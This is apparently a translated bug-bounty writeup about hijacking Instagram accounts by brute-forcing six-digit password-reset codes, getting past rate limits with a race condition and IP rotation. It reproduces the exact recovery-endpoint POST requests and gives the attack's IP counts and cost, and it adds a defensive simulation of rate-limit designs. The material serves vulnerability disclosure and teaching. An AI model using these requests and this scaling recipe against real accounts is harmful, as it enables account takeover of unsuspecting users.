
How to break the rate limit and get any Instagram account

2025-02-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This writeup explains how a rate limit was bypassed to take over an Instagram account. Many readers will not know where such a bug comes from, so this article summarizes the cause of the problem and how it was exploited; we hope it helps you understand the issue.

The writeup concerns an arbitrary account takeover vulnerability in the Instagram platform. By finding a way to bypass Instagram's rate limiting, the author could brute-force the password reset confirmation code of any Instagram account and so hijack that account. The author's account follows.

Starting from the password reset entry point

After the well-known data breach, Facebook has kept strengthening security controls across its platform, and it raised the bounty amounts for serious vulnerabilities, including account takeover, accordingly. I wanted to try my luck and see whether I could find something, and I hit the jackpot on Instagram (Instagram is owned by Facebook).

As soon as I started testing Instagram I thought of account takeover (Account Takeover), which naturally points at Instagram's forgotten-password feature. So I repeatedly tested the password reset flow with my own Instagram account on the web. After a reset request is submitted, Instagram sends a reset link to the email address associated with the account. That reset link appeared to be fully protected and watertight, and I could not find any flaw in it.

Digging into the mobile app

So I turned to the password reset mechanism in the Instagram mobile app, and there I found suspicious behaviour. When a user asks for a password reset and enters a mobile phone number, Instagram sends a 6-digit confirmation code to that number, and the reset only takes effect once the 6-digit code is entered in the app. In theory a 6-digit code has 10^6 = 1,000,000 possible values. If I could try all one million possibilities from the app, could I hijack any account? Surely Instagram's backend has some rate limiting (Rate Limiting) against exactly this kind of brute force. But I decided to give it a try.

At least my tests showed what Instagram's backend rate limiting looks like. Of the first 1000-plus requests I sent, about 250 went through and the remaining 750 were blocked by the rate limiter. I then sent another batch of 1000-plus requests, and this time most of them were blocked. On that evidence, Instagram's verification and rate limiting looked fine.

But two things puzzled me: the number of requests that got through, and the fact that Instagram did not blacklist me. Even though only a limited number of requests were accepted in a short period, I could keep sending requests continuously without ever being blocked. Was something wrong here?

Finding a way to break the rate limit (Rate Limiting)

After several days of continuous testing, I found a way to bypass Instagram's rate limiting, built on two things:

Race hazard (race condition)

IP rotation

Race hazard: also called a race condition (Race Condition), it describes a system or process whose output depends on the sequence or timing of events it does not control. The term comes from the image of two signals racing each other to decide which one takes effect first.

For example, if two processes on a computer try to modify the contents of shared memory at the same time and there is no concurrency control, the final result depends on the order and timing in which the two processes execute, and a conflicting concurrent access leaves the result incorrect. Race hazards are common in poorly designed electronic systems, especially logic circuits, but they are also common in software, especially multithreaded software.

IP rotation (IP Rotation): sending requests to the same server endpoint from different IP addresses within a given period. IP rotation is usually done through proxies, and it is commonly used to defeat anti-crawler mechanisms when scraping large amounts of data.

If you are unfamiliar with race hazards or race conditions, look them up before continuing. Using a race condition, I sent many password reset confirmation code guesses concurrently to the Instagram backend from multiple IP addresses. In this setup Instagram's rate limiting is bypassed and the requests are not blocked. The number of requests that can be sent depends on the concurrency of the requests and on the number of IP addresses used. I also found that the password reset confirmation code expires after 10 minutes, which makes the attack harder, so as many as 1000 different IP addresses may be needed to carry it out.
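To make the two bypass ingredients concrete, here is an added simulation (not the author's code and not Instagram's backend) of a code verifier whose quota is keyed on the client IP and applied as an unlocked check-then-increment, beside a verifier that budgets attempts per reset code under a lock and burns the code once the budget is spent. The same attacker model from the writeup, many source IPs each firing concurrent guesses, is run against both. The quota values (PER_IP_LIMIT, MAX_ATTEMPTS_PER_CODE), the attacker address pool and the thread counts are assumptions chosen for the simulation, not measured Instagram behaviour.

```python
"""Added simulation of the two rate-limit designs discussed above.
Not Instagram's code: the verifier classes, quotas and attacker pool are
constructed for illustration."""
import secrets
import threading
from collections import defaultdict

CODE_SPACE = 1_000_000        # 6-digit reset codes, as in the writeup
PER_IP_LIMIT = 200            # assumed per-IP quota in the weak design
MAX_ATTEMPTS_PER_CODE = 5     # assumed per-code budget in the hardened design


class PerIpVerifier:
    """Weak design: quota keyed on the source IP and applied as an unlocked
    check-then-increment. IP rotation gives every new address a fresh quota,
    and concurrent requests on one address can pass the check together."""

    def __init__(self, code: str):
        self.code = code
        self.count = defaultdict(int)        # requests seen per IP, no lock
        self.accepted = 0                    # guesses the server actually compared
        self.solved = False
        self._stats_lock = threading.Lock()  # only protects the bookkeeping

    def verify(self, src_ip: str, guess: str) -> bool:
        if self.count[src_ip] >= PER_IP_LIMIT:
            return False                     # request rejected as rate limited
        # Race window: another thread on the same IP may have read the same
        # count and also passed the check before this increment lands.
        self.count[src_ip] += 1
        with self._stats_lock:
            self.accepted += 1
            if guess == self.code:
                self.solved = True
        return True


class PerTargetVerifier:
    """Hardened design: the budget belongs to the reset code (the target
    account), is checked and consumed under one lock, and the code is
    invalidated once spent. Extra IPs and extra threads buy nothing."""

    def __init__(self, code: str):
        self.code = code
        self.attempts = 0
        self.accepted = 0
        self.solved = False
        self._lock = threading.Lock()

    def verify(self, src_ip: str, guess: str) -> bool:
        with self._lock:
            if self.attempts >= MAX_ATTEMPTS_PER_CODE:
                return False                 # code burned; user must request a new one
            self.attempts += 1
            self.accepted += 1
            if secrets.compare_digest(guess, self.code):
                self.solved = True
            return True


def run_attack(verifier, n_ips: int, per_ip_requests: int, threads_per_ip: int = 4) -> int:
    """Attacker model from the writeup: a pool of source IPs, each firing
    concurrent guesses over a disjoint slice of the code space. Returns how
    many guesses the server actually compared against the real code."""
    def fire(ip, guesses):
        for g in guesses:
            verifier.verify(ip, g)

    per_thread = per_ip_requests // threads_per_ip
    threads, next_code = [], 0
    for i in range(n_ips):
        src_ip = f"10.0.{i // 256}.{i % 256}"      # constructed attacker addresses
        for _ in range(threads_per_ip):
            guesses = [f"{c % CODE_SPACE:06d}" for c in range(next_code, next_code + per_thread)]
            next_code += per_thread
            threads.append(threading.Thread(target=fire, args=(src_ip, guesses)))
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return verifier.accepted


def coverage(accepted: int) -> float:
    """Fraction of the code space the attacker got to test within the code's
    lifetime; this is also the probability that a random code was found."""
    return min(accepted, CODE_SPACE) / CODE_SPACE


def demo(n_ips: int = 50, per_ip_requests: int = 400):
    """Same attacker against both designs; returns (weak_accepted, strong_accepted)."""
    code = f"{secrets.randbelow(CODE_SPACE):06d}"
    weak = run_attack(PerIpVerifier(code), n_ips, per_ip_requests)
    strong = run_attack(PerTargetVerifier(code), n_ips, per_ip_requests)
    return weak, strong


if __name__ == "__main__":
    weak, strong = demo()
    print(f"per-IP quota:    {weak} guesses checked ({coverage(weak):.2%} of code space)")
    print(f"per-code budget: {strong} guesses checked ({coverage(strong):.4%} of code space)")
```

Against the per-IP design every additional address adds a full quota, so the number of guesses checked grows linearly with the IP pool (and the unlocked check can admit a few more), which is exactly the arithmetic the author does later with 1000 and 5000 IPs. Against the per-code design the attacker gets MAX_ATTEMPTS_PER_CODE comparisons in total no matter how many IPs or threads are thrown at it, and the lock removes the race. The practical check for a defender is therefore not "is there a rate limit" but "what is the limit keyed on, and is the check-and-consume atomic".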

Later, after I reported the vulnerability to Facebook, their security team was initially unable to reproduce it because the report was not detailed enough. After several rounds of email, I recorded a proof-of-concept video and sent it to them, and they finally confirmed the vulnerability.

Proof of concept (PoC)

Requesting the confirmation code from the Instagram backend during a password reset:

POST /api/v1/users/lookup/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27 Pro; tulip; qcom; en_IN; 8.1.0; 440 dpi; 1080x2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

q=mobile_number&device_id=android-device-id-here

After this POST request, the victim receives a 6-digit password reset confirmation code, which is valid for 10 minutes.

When the client submits the confirmation code, the Instagram backend verifies it with:

POST /api/v1/accounts/account_recovery_code_verify/ HTTP/1.1
User-Agent: Instagram 92.0.0.11.114 Android (27 Pro; tulip; qcom; en_IN; 8.1.0; 440 dpi; 1080x2150; Xiaomi/xiaomi; Redmi Note 6 Pro; tulip; qcom; en_IN; 152830654)
Accept-Language: en-IN, en-US
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Host: i.instagram.com
Connection: keep-alive

recover_code=123456&device_id=android-device-id-here

Based on these two POST requests and the strategy above, brute-forcing the reset code against the verification endpoint requires multiple IP addresses. My tests found that, roughly, I could send nearly 2000 requests per IP address without being blocked by the Instagram backend's rate limiting.

In my actual test I used 1000 IP addresses on 1000 machines, achieved the required concurrency easily, and sent nearly 200,000 requests, covering 20% of the 1,000,000 possible codes.

In a real attack, an attacker with 5000 IP addresses could brute-force a valid password reset confirmation code and so "hack" (hijack) an Instagram account. That many IP addresses may sound hard to obtain, but with a cloud provider such as Amazon or Google it is easy, and brute-forcing all one million confirmation codes would cost only about $150.
